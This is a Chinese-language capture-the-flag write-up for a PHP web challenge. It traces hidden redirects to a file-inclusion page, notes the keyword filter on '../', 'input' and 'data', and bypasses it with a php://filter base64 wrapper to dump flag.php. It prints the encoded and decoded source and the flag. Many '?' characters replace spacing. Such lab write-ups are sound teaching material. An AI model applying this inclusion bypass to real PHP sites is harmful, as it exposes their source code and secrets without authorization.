- 打开靶机后,可以看到这样一个网页
????????2.页面上看没有可以输入的地方,于是尝试看一下网页源代码,发现有一个可跳转的网址:Archive_room.php
????????3.跳转后出现如下页面,有一个secret选项,点击一下发现没有任何可用信息,查看源代码也没有发现。?
?
????????4.返回上一个页面看一下源代码,发现还有一个可跳转网址
?
????????5.可以看到跳转的网页应该是action.php,但是点开后发现访问的是end.php。
?
?
????????6.抓包查看一下跳转过程
?
? ? ? ? ?7.发现由action.php到end.php中间还有一个过程,点开看一下发现还有隐藏跳转
????????8.进入这个网页发现是一串代码?
可以看到只要输入”../”、”tp”、”input”、”data”都会返回Oh no!,所以这些关键字被过滤掉了。
比如下面这种输入会显示Oh no!
http://355ecb6c-7fc7-4324-a22b-f8dde1fb5b75.node4.buuoj.cn:81/secr3t.php?file=php://input
?
直接进入看不到什么
?
????????9.所以如果想要看到这个文件中的内容,需要通过伪协议进行绕过
令参数为:
php://filter/convert.base64-encode/resource=flag.php
这样就可以得到flag.php文件源码base64编码后的字符串了。
?
得到如下base64位编码:
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NGE4YmUyZTYtNzkyNy00YmYwLTg1YTktM2I5MDIzMDEwY2VifSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
?
????????10.解码后得到一串代码
<!DOCTYPE html>
<html>
????<head>
????????<meta charset="utf-8">
????????<title>FLAG</title>
????</head>
????<body style="background-color:black;"><br><br><br><br><br><br>
????????
????????<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
????????
????????<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
????????????<?php
????????????????echo "我就在这里";
????????????????$flag = 'flag{4a8be2e6-7927-4bf0-85a9-3b9023010ceb}';
????????????????$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?????????????>
????????</p>
????</body>
</html>
11、得到flag
flag{4a8be2e6-7927-4bf0-85a9-3b9023010ceb}